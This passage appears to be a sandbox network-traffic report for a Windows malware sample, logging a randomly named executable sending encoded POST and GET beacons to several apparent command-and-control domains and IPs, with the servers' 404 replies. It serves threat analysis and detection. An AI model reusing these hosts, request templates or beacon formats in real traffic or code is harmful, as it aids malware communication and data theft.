                Date: Thu, 04 Jul 2024 10:37:12 GMT
                Connection: close
                Content-Length: 1611
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]
                Jul 4, 2024 12:37:07.874424934 CEST | 570 | IN | Data Raw: 74 3a 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 22 3e e8 bf 94 e5 9b 9e e4 b8 8a e4 b8 80 e9 a1 b5 3c 2f 61 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 48 31 3e e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e6 b2 a1 e6
                Data Ascii: t:history.go(-1);"></a></div><blockquote><H1></H1><ol> <ul type="square" class="olzafd7c"> <li></li> <li>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                13 | 192.168.2.4 | 60632 | 194.195.220.41 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:13.031455994 CEST | 777 | OUT | POST /9nq7/ HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.cheapdesklamp.shop
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.cheapdesklamp.shop/9nq7/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=6Uz5SbNQsUekEGMOjyjjMUlMhXK6LZr4nqbSyRSN3DOM4GLNXovZqBp3dvcVdMMVd9iXfAbDehBo1Ti231+Llxw3FVYc9r9yfCYSfPADS3+yZN1xx7x0Aj33vqrqj/F684eHbuCIEDsinp7UEC1mstwGrE4bEIAPzgMQYoYyUZ7YQ4lX0m/ARBczgDMC4vWzPg==
                Jul 4, 2024 12:37:13.551486015 CEST | 872 | IN | HTTP/1.1 200 OK
                Server: openresty/1.13.6.1
                Date: Thu, 04 Jul 2024 10:37:13 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                14 | 192.168.2.4 | 60633 | 194.195.220.41 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:15.560389996 CEST | 797 | OUT | POST /9nq7/ HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.cheapdesklamp.shop
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.cheapdesklamp.shop/9nq7/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=6Uz5SbNQsUekClEOzh7jJ0lP9nK6B5q/nqnSyUqdwwqM9UDNWqHZpBp3TPdeSsMed9u1fBnDehFo1We22HWIkhwxQFYkwL9yfCYSfPUlSzSyZ+dxyax7JD34mKrqn/F+84elbvfjEAUinrjUFXZlltwc2U5RXJpz+Vp6fOU7Yof0ce0NlXeXDB4A9EF21sr6UnaUV5vhlpns3oACSEai860=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                15 | 192.168.2.4 | 60634 | 194.195.220.41 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:18.137794971 CEST | 10879 | OUT | POST /9nq7/ HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.cheapdesklamp.shop
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.cheapdesklamp.shop/9nq7/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=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 [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                16 | 192.168.2.4 | 60635 | 194.195.220.41 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:20.644937038 CEST | 495 | OUT | GET /9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                17 | 192.168.2.4 | 60636 | 162.0.236.122 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:25.721255064 CEST | 756 | OUT | POST /gw8h/ HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.tofcomy.xyz
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.tofcomy.xyz/gw8h/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=+EFY+9AAmSyXKlTIoWKox+WoKoDmv2d4mzhQ7Csk9mCpeEUpwLOM4rlJTZqVt3qrcQpahvnDGlSYwySBrOr3WGxYJVJRfRw7o8q5ZY/H+Uyf8fYMJpRB8nr5PPOZ2Od9FvODyST/OnQyIhcZwOSgZzG5JeTAM0it+icMbtCfUN/wcId1VC/7sDWHL9h/lgcdjQ==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                18 | 192.168.2.4 | 60637 | 162.0.236.122 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:28.307761908 CEST | 776 | OUT | POST /gw8h/ HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.tofcomy.xyz
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.tofcomy.xyz/gw8h/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=+EFY+9AAmSyXLEjIvxeo6+WrU4DmlWd8mzlQ7DoO6UWpemcpzKOM7rlJHJrfjXqicQVohrnDGlWYw3uBr4j0XWxaPVJfCBw7o8q5ZYrt+Uqf/swMJNNOiXr6IPOZyOd5FvOhyXKSOhcyIgsZzfSjMjG7H+SsN2ym0H1cGdv9TcjPdOMvEzes+Dy0W6oLojhU4QuRQnZXJz/fr57APYq413M=
                Jul 4, 2024 12:37:28.941060066 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:28 GMT
                Server: Apache
                Content-Length: 1414
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Page </title> <script src="https://use.typekit.net/ytd4ine.js"></script><script>try{Typekit.load({ async: true });}catch(e){}</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main> <div> <div> <span>404&nbsp;error</span> <span>page&nbsp;not&nbsp;found</span> </div> <svg viewBox='0 0 200 600'> <polygon points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514 200 591.044514 200 8'></polygon> </svg> </div> <svg class='crack' viewBox='0 0 200 600'> <polyline points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514'></polyline> </svg> <div> <svg viewBox='0 0 200 600'> <polygon points [TRUNCATED]
                Jul 4, 2024 12:37:28.941147089 CEST | 323 | IN
                Data Ascii: 1505 505.694344 68.1413353 591.044514 0 591.044514 0 8'></polygon> </svg> <div> <span>sorry&nbsp;about&nbsp;that!</span> <span> <a> <b>return&nbsp;home?</b> </a> </span> </div> </div><


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                19 | 192.168.2.4 | 60638 | 162.0.236.122 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:30.842369080 CEST | 10858 | OUT | POST /gw8h/ HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.tofcomy.xyz
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.tofcomy.xyz/gw8h/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=+EFY+9AAmSyXLEjIvxeo6+WrU4DmlWd8mzlQ7DoO6UOpeTQpxpWM6rlJb5rcjXrycQNshqbTGneYwV2BtND0dWxaNVJefRwuo869ZY7t+Uqf/p0MeJROgXr5PPOV2OdBFvHWyTXvNR8yIA8ZgdKjNDG9A+S0N2/+0DtQGdqQTcHPf4dMUQmkoAaxLYgKxER18hnlcXBgTnjQxLW0SZqGjBjsGa0NPqPIUq2v2fiLsElnq2JB9mrVaupDd0UBIRqwUdROsW6w11tCV32KBZukdo9BLRnOYGYbMeHaAA2y9lhMgjabRypssP8Bw2FociBESC7OgCuDriJcG6B3O6YfjyykrAZkRsLCc4UZsbxj235BFhdT5YNXc9O3akHIrQ+7tsxg8QKU4VJwe+127hVKXL9Wiq7r1uPl+yY56TVCEm3ip+xGWKUbFSVKiPbbuOCGsuxM7msTySnfrCDcTJ5xSDdtF6AKzbV0WAS9TBkzMHlc3pdfiqCJCtldBc9ab42dELuQPh2pZMtDT1a5TV8sHD7sUFeXpa638lCDq7gBT5lsvXtYE2dxT/tDf4kKvLDLSdTXOCCOZPhfxlXwFYSFHZN87T566bzfAqsqFWB2PYCBCU8g0eaFs4NSO9UrHYwK12TdTKCOcnt2mhPEecODnElN/Na+Y36lhERdX0AuAD3kk++2Xj9K9wSGitdpBwAwa6dzah+XTUaCaVuwO4j2b6FVx2+6x4UaP2gGUgX+RCdThBJVaaheZfRxalEvS7Mkg+TMi6AZ3NqrUf/2xIDaiEHy2yiV4Obhv8WyEOoSxLHFt6TknrUqEq/ErpWoIzCNaYZ4CkwVaYEka9Xhkk3gCVOGaQYbaB6dSI5U867hCAoP3/y9Vzo0QTjvkX5zQguXL2qNm26XXOI/MSZUUzU+KJSeoAB/f6MnwX5qi/Vk52u7t9OG8sHqSQOyQs6/QIeYgZFzh13tjC9Lv/qWR5L67P3DtfvboE9qp4U1ajmQ4FI3Z [TRUNCATED]
                Jul 4, 2024 12:37:31.488029003 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:31 GMT
                Server: Apache
                Content-Length: 1414
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Page </title> <script src="https://use.typekit.net/ytd4ine.js"></script><script>try{Typekit.load({ async: true });}catch(e){}</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main> <div> <div> <span>404&nbsp;error</span> <span>page&nbsp;not&nbsp;found</span> </div> <svg viewBox='0 0 200 600'> <polygon points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514 200 591.044514 200 8'></polygon> </svg> </div> <svg class='crack' viewBox='0 0 200 600'> <polyline points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514'></polyline> </svg> <div> <svg viewBox='0 0 200 600'> <polygon points [TRUNCATED]
                Jul 4, 2024 12:37:31.488044977 CEST | 323 | IN
                Data Ascii: 1505 505.694344 68.1413353 591.044514 0 591.044514 0 8'></polygon> </svg> <div> <span>sorry&nbsp;about&nbsp;that!</span> <span> <a> <b>return&nbsp;home?</b> </a> </span> </div> </div><


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                20 | 192.168.2.4 | 60639 | 162.0.236.122 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:33.379559040 CEST | 488 | OUT | GET /gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                21 | 192.168.2.4 | 60640 | 52.1.217.30 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:46.701988935 CEST | 762 | OUT | POST /awho/ HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.wwfglobal.com
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.wwfglobal.com/awho/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=KIBsAk73uQEhZEyed8jruVW/GMVxNXdYVuETkTn2+zfie6jGKPbsLiBM0oD/EDzvfANvOvizNh+rHsC5CPRHz6HL7W0DkTnV17OqskkTwwOmshPP3Ct0dbac2APnG4sx8/RzIe+FatVP3tNqaGp02wW2647xmL3/V7X9Y8qBfuYj5AELSFdSmcdWXXJk4WRVdw==
                Jul 4, 2024 12:37:47.336909056 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:47 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=59sfsk5vb61o8dvihsk4a1tq01; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Content-Length: 1115
                Content-Type: text/html; charset=UTF-8
                Jul 4, 2024 12:37:47.336925030 CEST | 701 | IN


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                22 | 192.168.2.4 | 60641 | 52.1.217.30 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:49.265901089 CEST | 782 | OUT | POST /awho/ HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.wwfglobal.com
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.wwfglobal.com/awho/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=KIBsAk73uQEhL0uebb/rp1W8DMVxE3dEVu4TkSit/FPiebTGLLPsGCBMtYDjJjzkfAISOuezNhqrHp+5C4FYyqHJum0BrznV17OqskA5wwGmsRfP3gV7Crad/gPnQIt48/RrIfTeavdP3s9qa3p34AX9no7vuom0Vq+xXOufXssV4GVRD08F0c5lKQAQ1VscG/pSUmhlcovSmXkP+Bl6feY=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                23 | 192.168.2.4 | 60642 | 52.1.217.30 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:51.838017941 CEST | 10864 | OUT | POST /awho/ HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.wwfglobal.com
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.wwfglobal.com/awho/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=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 [TRUNCATED]
                Jul 4, 2024 12:37:52.321455956 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:52 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=rttvo4em4t1k4snuk62mngh6c6; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Content-Length: 1115
                Content-Type: text/html; charset=UTF-8
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 56 61 6f db 36 10 fd 5c ff 8a 0b 83 0d 09 16 4b b2 1b 04 85 2d 19 48 5d a7 c9 90 c4 59 a6 b4 eb a7 81 12 69 89 0d 2d aa 24 65 c7 0b fa df 77 a4 9c d4 c6 92 a1 2b 32 19 30 25 ea f8 ee ee f1 dd 51 f1 ce bb e9 38 fd 74 35 81 d3 f4 e2 1c ae 6e de 9e 9f 8d 81 74 c3 f0 e3 eb 71 18 be 4b df b5 2f 0e 83 a8 07 a9 a6 95 11 56 a8 8a ca 30 9c 5c 92 0e 29 ad ad 07 61 b8 5c 2e 83 e5 eb 40 e9 22 4c af c3 d2 ce e5 61 28 95 32 3c 60 96 91 51 27 76 53 6e e0 94 e1 30 e7 96 82 5b da e5 5f 1a b1 48 c8 58 55 96 57 b6 9b ae 6a 4e 20 6f 9f 12 62 f9 9d f5 68 43 c8 4b aa 0d b7 49 63 67 dd 37 0e f1 62 92 1e c3 e5 f1 c5 24 21 d7 d3 b7 d3 f4 77 02 e3 e9 65 3a b9 4c 13 72 39 bd 9c 3c da 9c a6 e9 55 77 f2 db cd d9 87 84 5c 5d 1f bf bf 38 de b2 ec 8e 8f c7 a7 4f 5b fb 37 5d 67 7b 3d 3d ff de 45 93 3f ae ce ae 27 9b d1 5c a8 ea 00 fa 7d f8 b5 91 d0 8f a2 3e f4 7a 83 5e 7f 80 84 be bf 48 11 a3 13 5b 61 25 1f 9d 4c 6f ae 61 7a 0a 6e dc 81 bd c3 e8 70 3f 0e db 57 9d d8 d8 95 e4 60 91 9f 35 2d b9 31 b8 [TRUNCATED]
                Data Ascii: Vao6\K-H]Yi-$ew+20%Q8t5ntqK/V0\)a\.@"La(2<`Q'vSn0[_HXUWjN obhCKIcg7b$!we:Lr9<Uw\]8O[7]g{==E?'\}>z^H[a%Loaznp?W`5-16Slu`@/~BTPSDU8@{skQMH`n~jk
                Jul 4, 2024 12:37:52.322978020 CEST | 701 | IN | Data Raw: 26 f0 d0 41 eb 1a 12 f4 f7 b4 c1 3a a0 d6 c2 87 e4 9d b8 58 9e c9 72 97 36 56 b9 78 b9 06 7a 00 5b 8f 83 85 40 4d 72 06 f7 a8 1b a9 f4 00 76 4f 4e 4e 86 f0 75 7b d5 a0 54 0b 1c bf 19 8d c7 63 67 f4 48 48 27 66 62 01 82 25 e4 db 32 02 fe 65 42 b6
                Data Ascii: &A:Xr6Vxz[@MrvONNu{TcgHH'fb%2eB-(JOGo!d4-j*sZ4Z9uZh!%X>r5[?fE.+;TWS;vJQh$YV,w8fRQ^dq{.P}Qdax='#


                Session ID | Source IP | Source Port | Destination IP | Destination Port
                24 | 192.168.2.4 | 60643 | 52.1.217.30 | 80
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:54.731409073 CEST | 490 | OUT | GET /awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:37:55.226159096 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:55 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=ocojme6j9q0ajf5vusma8tpnm2; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 61 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 4e 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 41 43 48 45 2d 43 4f 4e 54 52 4f 4c 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 [TRUNCATED]
                Data Ascii: a0e<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META NAME="ROBOTS" CONTENT="NONE"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"><META HTTP-EQUIV="EXPIRES" CONTENT="Mon, 22 Jul 2002 11:12:01 GMT"><title>FOUR OH FOUR! (404)</title><st
                Jul 4, 2024 12:37:55.226176977 CEST | 224 | IN | Data Raw: 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 2c 68 74 6d 6c 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65
